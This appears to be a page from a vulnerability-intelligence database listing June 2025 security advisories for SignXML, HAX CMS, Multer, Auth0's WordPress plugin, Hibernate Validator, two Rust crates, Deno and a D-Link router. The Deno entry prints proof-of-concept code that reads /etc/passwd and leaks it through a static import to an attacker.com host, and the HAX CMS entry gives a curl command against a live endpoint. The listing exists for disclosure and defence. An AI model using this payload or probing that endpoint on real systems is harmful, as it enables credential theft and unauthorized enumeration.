Threat and Vulnerability Intelligence Database
Example Searches:
CVE
Threat Actors
Countries
Vendors
Severity
Known Exploited
|
Description: When verifying signatures with X509 certificate validation turned off and HMAC shared secret set (signxml.XMLVerifier.verify(require_x509=False, hmac_key=...), prior versions of SignXML are vulnerable to a potential algorithm confusion attack. Unless the user explicitly limits the expected signature algorithms using the signxml.XMLVerifier.verify(expect_config=...) setting, an attacker may supply a signature unexpectedly signed with a key other than the provided HMAC key, using a different (asymmetric key) signature algorithm.
Starting with signxml 4.0.4, specifying hmac_key causes the set of accepted signature algorithms to be restricted to HMAC only, if not already restricted by the user.
References
https://github.com/XML-Security/signxml/security/advisories/GHSA-6vx8-pcwv-xhf4
https://nvd.nist.gov/vuln/detail/CVE-2025-48994
https://github.com/XML-Security/signxml/commit/e3c0c2b82a3329a65d917830657649c98b8c7600
https://github.com/advisories/GHSA-6vx8-pcwv-xhf4
CVSS: MEDIUM (6.9) EPSS Score: 0.03%
June 5th, 2025 (5 days ago)
|
|
|
Description: Summary
An unauthenticated information disclosure vulnerability exists in the PSU deployment of HAX CMS via the haxPsuUsage API endpoint. This allows any remote unauthenticated user to retrieve a full list of PSU websites hosted on HAX CMS. When chained with other authorization issues (e.g., HAX-3), this could assist in targeted attacks such as unauthorized content modification or deletion.
Details
The endpoint https://open-apis.hax.cloud/api/services/stats/haxPsuUsage returns a list of websites on the PSU instance of HAX CMS. This endpoint is exposed without any authentication or authorization checks.
The source of the issue is in the haxPsuUsage.js file, which appears to directly serve the site listing without verifying user identity or access level. This enables anyone with the endpoint URL to enumerate all site instances under the PSU deployment.
This endpoint may have originally been used for internal or statistical purposes but is now publicly accessible, representing a privacy and enumeration risk.
PoC
To reproduce this vulnerability:
Open a terminal or browser.
Send a GET request to the following endpoint:curl https://open-apis.hax.cloud/api/services/stats/haxPsuUsage
Impact
The haxPsuUsage endpoint exposes a full list of PSU HAX CMS websites to any unauthenticated user, allowing external actors to enumerate all sites under the PSU domain. This alone represents an information disclosure vulnerability.
When chained with the Lack Of Authorization Checks CVE, w...
CVSS: MEDIUM (5.3) EPSS Score: 0.04%
June 5th, 2025 (5 days ago)
|
|
|
Description: Impact
A vulnerability in Multer versions >=1.4.4-lts.1, <2.0.1 allows an attacker to trigger a Denial of Service (DoS) by sending an upload file request with an empty string field name. This request causes an unhandled exception, leading to a crash of the process.
Patches
Users should upgrade to 2.0.1
Workarounds
None
References
https://github.com/expressjs/multer/commit/35a3272b611945155e046dd5cef11088587635e9
https://github.com/expressjs/multer/issues/1233
https://github.com/expressjs/multer/pull/1256
References
https://github.com/expressjs/multer/security/advisories/GHSA-g5hg-p3ph-g8qg
https://nvd.nist.gov/vuln/detail/CVE-2025-48997
https://github.com/expressjs/multer/issues/1233
https://github.com/expressjs/multer/pull/1256
https://github.com/expressjs/multer/commit/35a3272b611945155e046dd5cef11088587635e9
https://github.com/advisories/GHSA-g5hg-p3ph-g8qg
CVSS: HIGH (8.7) EPSS Score: 0.04%
June 5th, 2025 (5 days ago)
|
|
|
Description: Overview
The Auth0 Wordpress plugin contains a critical vulnerability due to insecure deserialization of cookie data. If exploited, since SDKs process cookie content without prior authentication, a threat actor could send a specially crafted cookie containing malicious serialized data.
Am I Affected?
You are affected by this vulnerability if you meet the following preconditions:
Applications using the Auth0 WordPress plugin, versions between 5.0.0 BETA-0 to 5.0.1.
Auth0 WordPress plugin uses the Auth0-PHP SDK with version 8.0.0-BETA3 to 8.3.0.
Fix
Upgrade the Auth0 WordPress plugin to the latest version (v5.3.0).
References
https://github.com/auth0/auth0-PHP/security/advisories/GHSA-v9m8-9xxp-q492
https://github.com/auth0/laravel-auth0/security/advisories/GHSA-c42h-56wx-h85q
https://github.com/auth0/symfony/security/advisories/GHSA-98j6-67v3-mw34
https://github.com/auth0/wordpress/security/advisories/GHSA-862m-5253-832r
https://nvd.nist.gov/vuln/detail/CVE-2025-48951
https://github.com/advisories/GHSA-862m-5253-832r
CVSS: CRITICAL (9.3) EPSS Score: 0.08%
June 5th, 2025 (5 days ago)
|
|
|
Description: Hibernate Validator before 6.2.0 and 7.0.0, by default and depending how it is used, may interpolate user-supplied input in a constraint violation message with Expression Language. This could allow an attacker to access sensitive information or execute arbitrary Java code. Hibernate Validator as of 6.2.0 and 7.0.0 no longer interpolates custom constraint violation messages with Expression Language and strongly recommends not allowing user-supplied input in constraint violation messages. CVE-2020-5245 and CVE-2025-4428 are examples of related, downstream vulnerabilities involving Expression Language intepolation of user-supplied data.
References
https://nvd.nist.gov/vuln/detail/CVE-2025-35036
https://github.com/hibernate/hibernate-validator/pull/1138
https://github.com/hibernate/hibernate-validator/commit/05f795bb7cf18856004f40e5042709e550ed0d6e
https://github.com/hibernate/hibernate-validator/commit/254858d9dcc4e7cd775d1b0f47f482218077c5e1
https://github.com/hibernate/hibernate-validator/commit/d2db40b9e7d22c7a0b44d7665242dfc7b4d14d78
https://github.com/hibernate/hibernate-validator/commit/e076293b0ee1bfa97b6e67d05ad9eee1ad77e893
https://docs.jboss.org/hibernate/stable/validator/reference/en-US/html_single/#section-hibernateconstraintvalidatorcontext
https://github.com/hibernate/hibernate-validator/compare/6.1.7.Final...6.2.0.Final
https://hibernate.atlassian.net/browse/HV-1816
https://hibernate.org/validator/documentation/migration-guide/#6-2-0-cr1
https://in.relation.to...
CVSS: HIGH (7.9)
June 5th, 2025 (5 days ago)
|
|
|
Description: The following functions in the anon-vec crate are unsound due to insufficient checks on their arguments::
AnonVec::get_ref()
AnonVec::get_mut()
AnonVec::remove_get()
The crate was built as a learning project and is not being maintained.
References
https://github.com/RylanYancey/anon-vec
https://rustsec.org/advisories/RUSTSEC-2025-0039.html
https://github.com/advisories/GHSA-pr59-jjr4-gcf6
June 5th, 2025 (5 days ago)
|
|
|
Description: Affected versions append root to group listings, unless the correct listing has exactly 1024 groups.
This affects both:
The supplementary groups of a user
The group access list of the current process
If the caller uses this information for access control, this may lead to privilege escalation.
This crate is not currently maintained, so a patched version is not available.
Versions older than 0.8.0 do not contain the affected functions, so downgrading to them is a workaround.
Recommended alternatives
uzers (an actively maintained fork of the users crate)
sysinfo
References
https://github.com/ogham/rust-users/issues/44
https://rustsec.org/advisories/RUSTSEC-2025-0040.html
https://github.com/advisories/GHSA-m65q-v92h-cm7q
June 5th, 2025 (5 days ago)
|
|
|
Description: Summary
Static imports are exempted from the network permission check. An attacker could exploit this to leak the password file on the network.
Details
Static imports in Deno are exempted from the network permission check. This can be exploited by attackers in multiple ways, when third-party code is directly/indirectly executed with deno run:
The simplest payload would be a tracking pixel-like import that attackers place in their code to find out when developers use the attacker-controlled code.
When --allow-write and --allow-read permissions are given, an attacker can perform a sophisticated two-steps attack: first, they generate a ts/js file containing a static import and in a second execution load this static file.
PoC
const __filename = new URL("", import.meta.url).pathname;
let oldContent = await Deno.readTextFile(__filename);
let passFile = await Deno.readTextFile("/etc/passwd");
let pre =
'import {foo} from "[https://attacker.com?val=](https://attacker.com/?val=)' +
encodeURIComponent(passFile) + '";\n';
await Deno.writeTextFile(__filename, pre + oldContent);
Executing a file containing this payload twice, with deno run --allow-read --allow-write would cause the password file to leak on the network, even though no network permission was granted.
This vulnerability was fixed with the addition of the --allow-import flag: https://docs.deno.com/runtime/fundamentals/security/#network-access
References
https://github.com/denoland/deno/security/advisories/GHSA-jv4x...
June 5th, 2025 (5 days ago)
|
|
Description: The FTC's Andrew Ferguson called on Congress to update federal law to get rid of exceptions for tech firms that handle children's data.
June 5th, 2025 (5 days ago)
|
CVE-2025-5621 |
Description: A vulnerability has been found in D-Link DIR-816 1.10CNB05 and classified as critical. Affected by this vulnerability is the function qosClassifier of the file /goform/qosClassifier. The manipulation of the argument dip_address/sip_address leads to os command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. This vulnerability only affects products that are no longer supported by the maintainer. In D-Link DIR-816 1.10CNB05 wurde eine Schwachstelle gefunden. Sie wurde als kritisch eingestuft. Betroffen ist die Funktion qosClassifier der Datei /goform/qosClassifier. Mittels dem Manipulieren des Arguments dip_address/sip_address mit unbekannten Daten kann eine os command injection-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk passieren. Der Exploit steht zur öffentlichen Verfügung.
CVSS: HIGH (7.3) EPSS Score: 0.24%
June 5th, 2025 (5 days ago)
|